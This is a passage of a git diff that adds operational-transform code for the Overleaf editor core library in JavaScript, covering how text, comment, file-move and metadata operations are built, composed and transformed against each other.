SetCommentStateOperation.fromJSON(raw) + } + if (isRawEditNoOperation(raw)) { + return EditNoOperation.fromJSON() + } + throw new Error('Unsupported operation in EditOperationBuilder.fromJSON') + } +} + +/** + * @param {unknown} raw + * @returns {raw is RawTextOperation} + */ +function isTextOperation(raw) { + return raw !== null && typeof raw === 'object' && 'textOperation' in raw +} + +/** + * @param {unknown} raw + * @returns {raw is RawAddCommentOperation} + */ +function isRawAddCommentOperation(raw) { + return ( + raw !== null && + typeof raw === 'object' && + 'commentId' in raw && + 'ranges' in raw && + Array.isArray(raw.ranges) + ) +} + +/** + * @param {unknown} raw + * @returns {raw is RawDeleteCommentOperation} + */ +function isRawDeleteCommentOperation(raw) { + return raw !== null && typeof raw === 'object' && 'deleteComment' in raw +} + +/** + * @param {unknown} raw + * @returns {raw is RawSetCommentStateOperation} + */ +function isRawSetCommentStateOperation(raw) { + return ( + raw !== null && + typeof raw === 'object' && + 'commentId' in raw && + 'resolved' in raw && + typeof raw.resolved === 'boolean' + ) +} + +/** + * @param {unknown} raw + * @returns {raw is RawEditNoOperation} + */ +function isRawEditNoOperation(raw) { + return raw !== null && typeof raw === 'object' && 'noOp' in raw +} + +module.exports = EditOperationBuilder diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js b/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js new file mode 100644 index 0000000..c82393c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js @@ -0,0 +1,162 @@ +// @ts-check +const core = require('../..') +const Comment = require('../comment') +const EditNoOperation = require('./edit_no_operation') +const TextOperation = require('./text_operation') + +/** + * @import EditOperation from './edit_operation' + */ + +class EditOperationTransformer { + /** + * Transform two edit operations against each other. 
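As an aside on the builder just defined: EditOperationBuilder.fromJSON dispatches purely on the shape of the raw object, per the type guards. A sketch, assuming the `{ textOperation: [...] }` raw form with the scan-op encodings from scan_op.js (hypothetical require path):

const EditOperationBuilder = require('./libraries/overleaf-editor-core/lib/operation/edit_operation_builder') // hypothetical path

console.log(EditOperationBuilder.fromJSON({ textOperation: [3, 'hi'] }).constructor.name) // 'TextOperation'
console.log(EditOperationBuilder.fromJSON({ deleteComment: 'c1' }).constructor.name)      // 'DeleteCommentOperation'
console.log(EditOperationBuilder.fromJSON({ noOp: true }).constructor.name)               // 'EditNoOperation'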
+ * @param {EditOperation} a + * @param {EditOperation} b + * @returns {[EditOperation, EditOperation]} + */ + static transform(a, b) { + const { + AddCommentOperation, + DeleteCommentOperation, + SetCommentStateOperation, + } = core + + if (a instanceof EditNoOperation || b instanceof EditNoOperation) { + return [a, b] + } + + const transformers = [ + createTransformer(TextOperation, TextOperation, TextOperation.transform), + createTransformer(TextOperation, DeleteCommentOperation, noConflict), + createTransformer(TextOperation, SetCommentStateOperation, noConflict), + createTransformer(TextOperation, AddCommentOperation, (a, b) => { + // apply the text operation to the comment + const originalComment = new Comment(b.commentId, b.ranges, b.resolved) + const movedComment = originalComment.applyTextOperation(a, b.commentId) + return [ + a, + new AddCommentOperation( + movedComment.id, + movedComment.ranges, + movedComment.resolved + ), + ] + }), + createTransformer(AddCommentOperation, AddCommentOperation, (a, b) => { + if (a.commentId === b.commentId) { + return [new EditNoOperation(), b] + } + return [a, b] + }), + createTransformer(AddCommentOperation, DeleteCommentOperation, (a, b) => { + if (a.commentId === b.commentId) { + // delete wins + return [new EditNoOperation(), b] + } + return [a, b] + }), + createTransformer( + AddCommentOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId === b.commentId) { + const newA = new AddCommentOperation( + a.commentId, + a.ranges, + b.resolved + ) + return [newA, b] + } + return [a, b] + } + ), + createTransformer( + DeleteCommentOperation, + DeleteCommentOperation, + (a, b) => { + if (a.commentId === b.commentId) { + // if both operations delete the same comment, we can ignore both + return [new EditNoOperation(), new EditNoOperation()] + } + return [a, b] + } + ), + createTransformer( + DeleteCommentOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId === b.commentId) { + // delete wins + return [a, new EditNoOperation()] + } + return [a, b] + } + ), + createTransformer( + SetCommentStateOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId !== b.commentId) { + return [a, b] + } + + if (a.resolved === b.resolved) { + return [new EditNoOperation(), new EditNoOperation()] + } + + const shouldResolve = a.resolved && b.resolved + if (a.resolved === shouldResolve) { + return [a, new EditNoOperation()] + } else { + return [new EditNoOperation(), b] + } + } + ), + ] + + for (const transformer of transformers) { + const result = transformer(a, b) + if (result) { + return result + } + } + + throw new Error( + `Transform not implemented for ${a.constructor.name}○${b.constructor.name}` + ) + } +} + +/** + * @template {EditOperation} X + * @template {EditOperation} Y + * @param {new(...args: any[]) => X} ClassA + * @param {new(...args: any[]) => Y} ClassB + * @param {(a: X, b: Y) => [EditOperation, EditOperation]} transformer + * @returns {(a: EditOperation, b: EditOperation) => [EditOperation, EditOperation] | false} + */ +function createTransformer(ClassA, ClassB, transformer) { + return (a, b) => { + if (a instanceof ClassA && b instanceof ClassB) { + return transformer(a, b) + } + if (b instanceof ClassA && a instanceof ClassB) { + const [bPrime, aPrime] = transformer(b, a) + return [aPrime, bPrime] + } + return false + } +} + +/** + * + * @param {EditOperation} a + * @param {EditOperation} b + * @returns {[EditOperation, EditOperation]} + */ +function noConflict(a, b) { + return [a, b] +} + 
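The convergence guarantee can be spot-checked with two concurrent text edits; same assumptions as the compose sketch earlier (hypothetical require paths, TextOperation builder API, apply() mutating a StringFileData):

const EditOperationTransformer = require('./libraries/overleaf-editor-core/lib/operation/edit_operation_transformer')
const TextOperation = require('./libraries/overleaf-editor-core/lib/operation/text_operation')
const StringFileData = require('./libraries/overleaf-editor-core/lib/file_data/string_file_data')

const a = new TextOperation().retain(3).insert('X') // append 'X'
const b = new TextOperation().insert('Y').retain(3) // prepend 'Y'
const [aPrime, bPrime] = EditOperationTransformer.transform(a, b)

const left = new StringFileData('abc')
a.apply(left)      // 'abcX'
bPrime.apply(left) // 'YabcX'

const right = new StringFileData('abc')
b.apply(right)      // 'Yabc'
aPrime.apply(right) // 'YabcX'

console.log(left.getContent(), right.getContent()) // both orders converge on 'YabcX'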
+module.exports = EditOperationTransformer diff --git a/libraries/overleaf-editor-core/lib/operation/index.js b/libraries/overleaf-editor-core/lib/operation/index.js new file mode 100644 index 0000000..ebc6f73 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/index.js @@ -0,0 +1,462 @@ +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const EditOperationTransformer = require('./edit_operation_transformer') + +// Dependencies are loaded at the bottom of the file to mitigate circular +// dependency +let NoOperation = null +let AddFileOperation = null +let MoveFileOperation = null +let EditFileOperation = null +let SetFileMetadataOperation = null + +/** + * @import { BlobStore } from "../types" + * @import Snapshot from "../snapshot" + */ + +/** + * An `Operation` changes a `Snapshot` when it is applied. See the + * {@tutorial OT} tutorial for background. + */ +class Operation { + /** + * Deserialize an Operation. + * + * @param {Object} raw + * @return {Operation} one of the subclasses + */ + static fromRaw(raw) { + if ('file' in raw) { + return AddFileOperation.fromRaw(raw) + } + if ( + 'textOperation' in raw || + 'commentId' in raw || + 'deleteComment' in raw + ) { + return EditFileOperation.fromRaw(raw) + } + if ('newPathname' in raw) { + return new MoveFileOperation(raw.pathname, raw.newPathname) + } + if ('metadata' in raw) { + return new SetFileMetadataOperation(raw.pathname, raw.metadata) + } + if (_.isEmpty(raw)) { + return new NoOperation() + } + throw new Error('invalid raw operation ' + JSON.stringify(raw)) + } + + /** + * Serialize an Operation. + * + * @return {Object} + */ + toRaw() { + return {} + } + + /** + * Whether this operation does nothing when applied. + * + * @return {Boolean} + */ + isNoOp() { + return false + } + + /** + * If this Operation references blob hashes, add them to the given Set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) {} + + /** + * If this operation references any files, load the files. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) {} + + /** + * Return a version of this operation that is suitable for long term storage. + * In most cases, we just need to convert the operation to raw form, but if + * the operation involves File objects, we may need to store their content. + * + * @param {BlobStore} blobStore + * @return {Promise.} + */ + async store(blobStore) { + return this.toRaw() + } + + /** + * Apply this Operation to a snapshot. + * + * The snapshot is modified in place. + * + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + assert.object(snapshot, 'bad snapshot') + } + + /** + * Whether this operation can be composed with another operation to produce a + * single operation of the same type as this one, while keeping the composed + * operation small and logical enough to be used in the undo stack. + * + * @param {Operation} other + * @return {Boolean} + */ + canBeComposedWithForUndo(other) { + return false + } + + /** + * Whether this operation can be composed with another operation to produce a + * single operation of the same type as this one. + * + * TODO Moves can be composed. For example, if you rename a to b and then decide + * shortly after that actually you want to call it c, we could compose the two + * to get a -> c). Edits can also be composed --- see rules in TextOperation. 
+ * We also need to consider the Change --- we will need to consider both time + * and author(s) when composing changes. I guess that AddFile can also be + * composed in some cases --- if you upload a file and then decide it was the + * wrong one and upload a new one, we could drop the one in the middle, but + * that seems like a pretty rare case. + * + * @param {Operation} other + * @return {Boolean} + */ + canBeComposedWith(other) { + return false + } + + /** + * Compose this operation with another operation to produce a single operation + * of the same type as this one. + * + * @param {Operation} other + * @return {Operation} + */ + compose(other) { + throw new Error('not implemented') + } + + /** + * Transform takes two operations A and B that happened concurrently and + * produces two operations A' and B' (in an array) such that + * `apply(apply(S, A), B') = apply(apply(S, B), A')`. + * + * That is, if one client applies A and then B', they get the same result as + * another client who applies B and then A'. + * + * @param {Operation} a + * @param {Operation} b + * @return {Operation[]} operations `[a', b']` + */ + static transform(a, b) { + if (a.isNoOp() || b.isNoOp()) return [a, b] + + function transpose(transformer) { + return transformer(b, a).reverse() + } + + const bIsAddFile = b instanceof AddFileOperation + const bIsEditFile = b instanceof EditFileOperation + const bIsMoveFile = b instanceof MoveFileOperation + const bIsSetFileMetadata = b instanceof SetFileMetadataOperation + + if (a instanceof AddFileOperation) { + if (bIsAddFile) return transformAddFileAddFile(a, b) + if (bIsMoveFile) return transformAddFileMoveFile(a, b) + if (bIsEditFile) return transformAddFileEditFile(a, b) + if (bIsSetFileMetadata) return transformAddFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof MoveFileOperation) { + if (bIsAddFile) return transpose(transformAddFileMoveFile) + if (bIsMoveFile) return transformMoveFileMoveFile(a, b) + if (bIsEditFile) return transformMoveFileEditFile(a, b) + if (bIsSetFileMetadata) return transformMoveFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof EditFileOperation) { + if (bIsAddFile) return transpose(transformAddFileEditFile) + if (bIsMoveFile) return transpose(transformMoveFileEditFile) + if (bIsEditFile) return transformEditFileEditFile(a, b) + if (bIsSetFileMetadata) return transformEditFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof SetFileMetadataOperation) { + if (bIsAddFile) return transpose(transformAddFileSetFileMetadata) + if (bIsMoveFile) return transpose(transformMoveFileSetFileMetadata) + if (bIsEditFile) return transpose(transformEditFileSetFileMetadata) + if (bIsSetFileMetadata) return transformSetFileMetadatas(a, b) + throw new Error('bad op b') + } + throw new Error('bad op a') + } + + /** + * Transform each operation in `a` by each operation in `b` and save the primed + * operations in place. 
+ * + * @param {Array.} as - modified in place + * @param {Array.} bs - modified in place + */ + static transformMultiple(as, bs) { + for (let i = 0; i < as.length; ++i) { + for (let j = 0; j < bs.length; ++j) { + const primes = Operation.transform(as[i], bs[j]) + as[i] = primes[0] + bs[j] = primes[1] + } + } + } + + static addFile(pathname, file) { + return new AddFileOperation(pathname, file) + } + + static editFile(pathname, editOperation) { + return new EditFileOperation(pathname, editOperation) + } + + static moveFile(pathname, newPathname) { + return new MoveFileOperation(pathname, newPathname) + } + + static removeFile(pathname) { + return new MoveFileOperation(pathname, '') + } + + static setFileMetadata(pathname, metadata) { + return new SetFileMetadataOperation(pathname, metadata) + } +} + +// +// Transform +// +// The way to read these transform functions is that +// 1. return_value[0] is the op to be applied after arguments[1], and +// 2. return_value[1] is the op to be applied after arguments[0], +// in order to arrive at the same project state. +// + +function transformAddFileAddFile(add1, add2) { + if (add1.getPathname() === add2.getPathname()) { + return [Operation.NO_OP, add2] // add2 wins + } + + return [add1, add2] +} + +function transformAddFileMoveFile(add, move) { + function relocateAddFile() { + return new AddFileOperation(move.getNewPathname(), add.getFile().clone()) + } + + if (add.getPathname() === move.getPathname()) { + if (move.isRemoveFile()) { + return [add, Operation.NO_OP] + } + return [ + relocateAddFile(), + new MoveFileOperation(add.getPathname(), move.getNewPathname()), + ] + } + + if (add.getPathname() === move.getNewPathname()) { + return [relocateAddFile(), new MoveFileOperation(move.getPathname(), '')] + } + + return [add, move] +} + +function transformAddFileEditFile(add, edit) { + if (add.getPathname() === edit.getPathname()) { + return [add, Operation.NO_OP] // the add wins + } + + return [add, edit] +} + +function transformAddFileSetFileMetadata(add, set) { + if (add.getPathname() === set.getPathname()) { + const newFile = add.getFile().clone() + newFile.setMetadata(set.getMetadata()) + return [new AddFileOperation(add.getPathname(), newFile), set] + } + + return [add, set] +} + +// +// This is one of the trickier ones. 
There are 15 possible equivalence +// relationships between our four variables: +// +// path1, newPath1, path2, newPath2 --- "same move" (all equal) +// +// path1, newPath1, path2 | newPath2 --- "no-ops" (1) +// path1, newPath1, newPath2 | path2 --- "no-ops" (1) +// path1, path2, newPath2 | newPath1 --- "no-ops" (2) +// newPath1, path2, newPath2 | path1 --- "no-ops" (2) +// +// path1, newPath1 | path2, newPath2 --- "no-ops" (1 and 2) +// path1, path2 | newPath1, newPath2 --- "same move" +// path1, newPath2 | newPath1, path2 --- "opposite moves" +// +// path1, newPath1 | path2 | newPath2 --- "no-ops" (1) +// path1, path2 | newPath1 | newPath2 --- "divergent moves" +// path1, newPath2 | newPath1 | path2 --- "transitive move" +// newPath1, path2 | path1 | newPath2 --- "transitive move" +// newPath1, newPath2 | path1 | path2 --- "convergent move" +// path2, newPath2 | path1 | newPath1 --- "no-ops" (2) +// +// path1 | newPath1 | path2 | newPath2 --- "no conflict" +// +function transformMoveFileMoveFile(move1, move2) { + const path1 = move1.getPathname() + const path2 = move2.getPathname() + const newPath1 = move1.getNewPathname() + const newPath2 = move2.getNewPathname() + + // the same move + if (path1 === path2 && newPath1 === newPath2) { + return [Operation.NO_OP, Operation.NO_OP] + } + + // no-ops + if (path1 === newPath1 && path2 === newPath2) { + return [Operation.NO_OP, Operation.NO_OP] + } + if (path1 === newPath1) { + return [Operation.NO_OP, move2] + } + if (path2 === newPath2) { + return [move1, Operation.NO_OP] + } + + // opposite moves (foo -> bar, bar -> foo) + if (path1 === newPath2 && path2 === newPath1) { + // We can't handle this very well: if we wanted move2 (say) to win, move2' + // would have to be addFile(foo) with the content of bar, but we don't have + // the content of bar available here. So, we just destroy both files. 
+ return [Operation.removeFile(path1), Operation.removeFile(path2)] + } + + // divergent moves (foo -> bar, foo -> baz); convention: move2 wins + if (path1 === path2 && newPath1 !== newPath2) { + return [Operation.NO_OP, Operation.moveFile(newPath1, newPath2)] + } + + // convergent move (foo -> baz, bar -> baz); convention: move2 wins + if (newPath1 === newPath2 && path1 !== path2) { + return [Operation.removeFile(path1), move2] + } + + // transitive move: + // 1: foo -> baz, 2: bar -> foo (result: bar -> baz) or + // 1: foo -> bar, 2: bar -> baz (result: foo -> baz) + if (path1 === newPath2 && newPath1 !== path2) { + return [ + Operation.moveFile(newPath2, newPath1), + Operation.moveFile(path2, newPath1), + ] + } + if (newPath1 === path2 && path1 !== newPath2) { + return [ + Operation.moveFile(path1, newPath2), + Operation.moveFile(newPath1, newPath2), + ] + } + + // no conflict + return [move1, move2] +} + +function transformMoveFileEditFile(move, edit) { + if (move.getPathname() === edit.getPathname()) { + if (move.isRemoveFile()) { + // let the remove win + return [move, Operation.NO_OP] + } + return [ + move, + Operation.editFile(move.getNewPathname(), edit.getOperation()), + ] + } + + if (move.getNewPathname() === edit.getPathname()) { + // let the move win + return [move, Operation.NO_OP] + } + + return [move, edit] +} + +function transformMoveFileSetFileMetadata(move, set) { + if (move.getPathname() === set.getPathname()) { + return [ + move, + Operation.setFileMetadata(move.getNewPathname(), set.getMetadata()), + ] + } + // A: mv foo -> bar + // B: set bar.x + // + // A': mv foo -> bar + // B': nothing + if (move.getNewPathname() === set.getPathname()) { + return [move, Operation.NO_OP] // let the move win + } + return [move, set] +} + +function transformEditFileEditFile(edit1, edit2) { + if (edit1.getPathname() === edit2.getPathname()) { + const primeOps = EditOperationTransformer.transform( + edit1.getOperation(), + edit2.getOperation() + ) + return [ + Operation.editFile(edit1.getPathname(), primeOps[0]), + Operation.editFile(edit2.getPathname(), primeOps[1]), + ] + } + + return [edit1, edit2] +} + +function transformEditFileSetFileMetadata(edit, set) { + // There is no conflict. + return [edit, set] +} + +function transformSetFileMetadatas(set1, set2) { + if (set1.getPathname() === set2.getPathname()) { + return [Operation.NO_OP, set2] // set2 wins + } + return [set1, set2] +} + +module.exports = Operation + +// Work around circular import +NoOperation = require('./no_operation') +AddFileOperation = require('./add_file_operation') +MoveFileOperation = require('./move_file_operation') +EditFileOperation = require('./edit_file_operation') +SetFileMetadataOperation = require('./set_file_metadata_operation') + +Operation.NO_OP = new NoOperation() diff --git a/libraries/overleaf-editor-core/lib/operation/move_file_operation.js b/libraries/overleaf-editor-core/lib/operation/move_file_operation.js new file mode 100644 index 0000000..85e3707 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/move_file_operation.js @@ -0,0 +1,54 @@ +'use strict' + +const Operation = require('./') + +/** + * Moves or removes a file from a project. 
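As a concrete check of the divergent-move convention above ('move2 wins'), using the Operation facade; the require path is hypothetical:

const Operation = require('./libraries/overleaf-editor-core/lib/operation') // hypothetical path

// Both sides concurrently move 'foo': one to 'bar', one to 'baz'.
const move1 = Operation.moveFile('foo', 'bar')
const move2 = Operation.moveFile('foo', 'baz')

const [move1Prime, move2Prime] = Operation.transform(move1, move2)
console.log(move1Prime.isNoOp()) // true: by convention move2 wins
console.log(move2Prime.toRaw())  // { pathname: 'bar', newPathname: 'baz' }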
+ */ +class MoveFileOperation extends Operation { + /** + * @param {string} pathname + * @param {string} newPathname + */ + constructor(pathname, newPathname) { + super() + this.pathname = pathname + this.newPathname = newPathname + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + newPathname: this.newPathname, + } + } + + getPathname() { + return this.pathname + } + + getNewPathname() { + return this.newPathname + } + + /** + * Whether this operation is a MoveFile operation that deletes the file. + * + * @return {boolean} + */ + isRemoveFile() { + return this.getNewPathname() === '' + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + snapshot.moveFile(this.getPathname(), this.getNewPathname()) + } +} + +module.exports = MoveFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/no_operation.js b/libraries/overleaf-editor-core/lib/operation/no_operation.js new file mode 100644 index 0000000..4c79665 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/no_operation.js @@ -0,0 +1,20 @@ +'use strict' + +const Operation = require('./') + +/** + * An explicit no-operation. + * + * There are several no-ops, such as moving a file to itself, but it's useful + * to have a generic no-op as well. + */ +class NoOperation extends Operation { + /** + * @inheritdoc + */ + isNoOp() { + return true + } +} + +module.exports = NoOperation diff --git a/libraries/overleaf-editor-core/lib/operation/scan_op.js b/libraries/overleaf-editor-core/lib/operation/scan_op.js new file mode 100644 index 0000000..4f179f2 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/scan_op.js @@ -0,0 +1,457 @@ +// @ts-check +const { containsNonBmpChars } = require('../util') +const { + ApplyError, + InvalidInsertionError, + UnprocessableError, +} = require('../errors') +const ClearTrackingProps = require('../file_data/clear_tracking_props') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import { RawScanOp, RawInsertOp, RawRetainOp, RawRemoveOp, TrackingDirective } from '../types' + * + * @typedef {{ length: number, inputCursor: number, readonly inputLength: number}} LengthApplyContext + */ + +class ScanOp { + constructor() { + if (this.constructor === ScanOp) { + throw new Error('Cannot instantiate abstract class') + } + } + + /** + * Applies an operation to a length + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + throw new Error('abstract method') + } + + /** + * @returns {RawScanOp} + */ + toJSON() { + throw new Error('abstract method') + } + + /** + * @param {RawScanOp} raw + * @returns {ScanOp} + */ + static fromJSON(raw) { + if (isRetain(raw)) { + return RetainOp.fromJSON(raw) + } else if (isInsert(raw)) { + return InsertOp.fromJSON(raw) + } else if (isRemove(raw)) { + return RemoveOp.fromJSON(raw) + } + throw new UnprocessableError(`Invalid ScanOp ${JSON.stringify(raw)}`) + } + + /** + * Tests whether two ScanOps are equal + * @param {ScanOp} _other + * @returns {boolean} + */ + equals(_other) { + return false + } + + /** + * Tests whether two ScanOps can be merged into a single operation + * @param {ScanOp} other + * @returns + */ + canMergeWith(other) { + return false + } + + /** + * Merge two ScanOps into a single operation + * @param {ScanOp} _other + * @returns {void} + */ + mergeWith(_other) { + throw new Error('abstract method') + } + + toString() { + 'ScanOp' + } +} + +class InsertOp extends ScanOp { + /** + * + * @param {string} insertion + * @param 
{TrackingProps | undefined} tracking + * @param {string[] | undefined} commentIds + */ + constructor(insertion, tracking = undefined, commentIds = undefined) { + super() + if (typeof insertion !== 'string') { + throw new InvalidInsertionError('insertion must be a string') + } + if (containsNonBmpChars(insertion)) { + throw new InvalidInsertionError('insertion contains non-BMP characters') + } + /** @type {string} */ + this.insertion = insertion + /** @type {TrackingProps | undefined} */ + this.tracking = tracking + /** @type {string[] | undefined} */ + this.commentIds = commentIds + } + + /** + * + * @param {RawInsertOp} op + * @returns {InsertOp} + */ + static fromJSON(op) { + if (typeof op === 'string') { + return new InsertOp(op) + } + // It must be an object with an 'i' property. + if (typeof op.i !== 'string') { + throw new InvalidInsertionError( + 'insert operation must have a string property' + ) + } + return new InsertOp( + op.i, + op.tracking && TrackingProps.fromRaw(op.tracking), + op.commentIds + ) + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + current.length += this.insertion.length + return current + } + + /** @inheritdoc + * @param {ScanOp} other + */ + equals(other) { + if (!(other instanceof InsertOp)) { + return false + } + if (this.insertion !== other.insertion) { + return false + } + if (this.tracking) { + if (!this.tracking.equals(other.tracking)) { + return false + } + } else if (other.tracking) { + return false + } + + if (this.commentIds) { + return ( + this.commentIds.length === other.commentIds?.length && + this.commentIds.every(id => other.commentIds?.includes(id)) + ) + } + return !other.commentIds + } + + /** + * @param {ScanOp} other + * @return {other is InsertOp} + */ + canMergeWith(other) { + if (!(other instanceof InsertOp)) { + return false + } + if (this.tracking) { + if (!this.tracking.equals(other.tracking)) { + return false + } + } else if (other.tracking) { + return false + } + if (this.commentIds) { + return ( + this.commentIds.length === other.commentIds?.length && + this.commentIds.every(id => other.commentIds?.includes(id)) + ) + } + return !other.commentIds + } + + /** + * @param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.insertion += other.insertion + // We already have the same tracking info and commentIds + } + + /** + * @returns {RawInsertOp} + */ + toJSON() { + if (!this.tracking && !this.commentIds) { + return this.insertion + } + /** @type RawInsertOp */ + const obj = { i: this.insertion } + if (this.tracking) { + obj.tracking = this.tracking.toRaw() + } + if (this.commentIds) { + obj.commentIds = this.commentIds + } + return obj + } + + toString() { + return `insert '${this.insertion}'` + } +} + +class RetainOp extends ScanOp { + /** + * @param {number} length + * @param {TrackingDirective | undefined} tracking + */ + constructor(length, tracking = undefined) { + super() + if (length < 0) { + throw new Error('length must be non-negative') + } + /** @type {number} */ + this.length = length + /** @type {TrackingDirective | undefined} */ + this.tracking = tracking + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + if (current.inputCursor + this.length > current.inputLength) { + throw new ApplyError( + "Operation can't retain more chars than are left in the string.", 
+ this.toJSON(), + current.inputLength + ) + } + current.length += this.length + current.inputCursor += this.length + return current + } + + /** + * + * @param {RawRetainOp} op + * @returns {RetainOp} + */ + static fromJSON(op) { + if (typeof op === 'number') { + return new RetainOp(op) + } + // It must be an object with a 'r' property. + if (typeof op.r !== 'number') { + throw new Error('retain operation must have a number property') + } + if (op.tracking) { + const tracking = + op.tracking.type === 'none' + ? new ClearTrackingProps() + : TrackingProps.fromRaw(op.tracking) + return new RetainOp(op.r, tracking) + } + return new RetainOp(op.r) + } + + /** @inheritdoc + * @param {ScanOp} other + */ + equals(other) { + if (!(other instanceof RetainOp)) { + return false + } + if (this.length !== other.length) { + return false + } + if (this.tracking) { + return this.tracking.equals(other.tracking) + } + return !other.tracking + } + + /** + * @param {ScanOp} other + * @return {other is RetainOp} + */ + canMergeWith(other) { + if (!(other instanceof RetainOp)) { + return false + } + if (this.tracking) { + return this.tracking.equals(other.tracking) + } + return !other.tracking + } + + /** + * @param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.length += other.length + } + + /** + * @returns {RawRetainOp} + */ + toJSON() { + if (!this.tracking) { + return this.length + } + return { r: this.length, tracking: this.tracking.toRaw() } + } + + toString() { + return `retain ${this.length}` + } +} + +class RemoveOp extends ScanOp { + /** + * @param {number} length + */ + constructor(length) { + super() + if (length < 0) { + throw new Error('length must be non-negative') + } + /** @type {number} */ + this.length = length + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + current.inputCursor += this.length + return current + } + + /** + * + * @param {RawRemoveOp} op + * @returns {RemoveOp} + */ + static fromJSON(op) { + if (typeof op !== 'number' || op > 0) { + throw new Error('delete operation must be a negative number') + } + return new RemoveOp(-op) + } + + /** + * @inheritdoc + * @param {ScanOp} other + * @return {boolean} + */ + equals(other) { + if (!(other instanceof RemoveOp)) { + return false + } + return this.length === other.length + } + + /** + * @param {ScanOp} other + * @return {other is RemoveOp} + */ + canMergeWith(other) { + return other instanceof RemoveOp + } + + /** + * @param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.length += other.length + } + + /** + * @returns {RawRemoveOp} + */ + toJSON() { + return -this.length + } + + toString() { + return `remove ${this.length}` + } +} + +/** + * @param {RawScanOp} op + * @returns {op is RawRetainOp} + */ +function isRetain(op) { + return ( + (typeof op === 'number' && op > 0) || + (typeof op === 'object' && + 'r' in op && + typeof op.r === 'number' && + op.r > 0) + ) +} + +/** + * @param {RawScanOp} op + * @returns {op is RawInsertOp} + */ +function isInsert(op) { + return ( + typeof op === 'string' || + (typeof op === 'object' && 'i' in op && typeof op.i === 'string') + ) +} + +/** + * @param {RawScanOp} op + * @returns {op is RawRemoveOp} + */ +function isRemove(op) { + return typeof op === 'number' && op < 0 +} + +module.exports = { + ScanOp, + 
InsertOp,
+  RetainOp,
+  RemoveOp,
+  isRetain,
+  isInsert,
+  isRemove,
+}
diff --git a/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js b/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js
new file mode 100644
index 0000000..5ac1a46
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/operation/set_comment_state_operation.js
@@ -0,0 +1,112 @@
+// @ts-check
+const core = require('../../index')
+const Comment = require('../comment')
+const EditNoOperation = require('./edit_no_operation')
+const EditOperation = require('./edit_operation')
+
+/**
+ * @import DeleteCommentOperation from './delete_comment_operation'
+ * @import { CommentRawData } from '../types'
+ * @import { RawSetCommentStateOperation } from '../types'
+ * @import StringFileData from '../file_data/string_file_data'
+ */
+
+/**
+ * @extends EditOperation
+ */
+class SetCommentStateOperation extends EditOperation {
+  /**
+   * @param {string} commentId
+   * @param {boolean} resolved
+   */
+  constructor(commentId, resolved) {
+    super()
+    this.commentId = commentId
+    this.resolved = resolved
+  }
+
+  /**
+   *
+   * @returns {RawSetCommentStateOperation}
+   */
+  toJSON() {
+    return {
+      resolved: this.resolved,
+      commentId: this.commentId,
+    }
+  }
+
+  /**
+   * @param {StringFileData} fileData
+   */
+  apply(fileData) {
+    const comment = fileData.comments.getComment(this.commentId)
+    if (comment) {
+      const newComment = new Comment(comment.id, comment.ranges, this.resolved)
+      fileData.comments.add(newComment)
+    }
+  }
+
+  /**
+   * @param {StringFileData} previousState
+   * @returns {SetCommentStateOperation | EditNoOperation}
+   */
+  invert(previousState) {
+    const comment = previousState.comments.getComment(this.commentId)
+    if (!comment) {
+      return new EditNoOperation()
+    }
+
+    return new SetCommentStateOperation(this.commentId, comment.resolved)
+  }
+
+  /**
+   * @inheritdoc
+   * @param {EditOperation} other
+   * @returns {boolean}
+   */
+  canBeComposedWith(other) {
+    return (
+      (other instanceof SetCommentStateOperation &&
+        this.commentId === other.commentId) ||
+      (other instanceof core.DeleteCommentOperation &&
+        this.commentId === other.commentId)
+    )
+  }
+
+  /**
+   * @inheritdoc
+   * @param {EditOperation} other
+   * @returns {SetCommentStateOperation | core.DeleteCommentOperation}
+   */
+  compose(other) {
+    if (
+      other instanceof SetCommentStateOperation &&
+      other.commentId === this.commentId
+    ) {
+      return other
+    }
+
+    if (
+      other instanceof core.DeleteCommentOperation &&
+      other.commentId === this.commentId
+    ) {
+      return other
+    }
+
+    throw new Error(
+      `Trying to compose SetCommentStateOperation with ${other?.constructor?.name}.`
+    )
+  }
+
+  /**
+   * @inheritdoc
+   * @param {RawSetCommentStateOperation} raw
+   * @returns {SetCommentStateOperation}
+   */
+  static fromJSON(raw) {
+    return new SetCommentStateOperation(raw.commentId, raw.resolved)
+  }
+}
+
+module.exports = SetCommentStateOperation
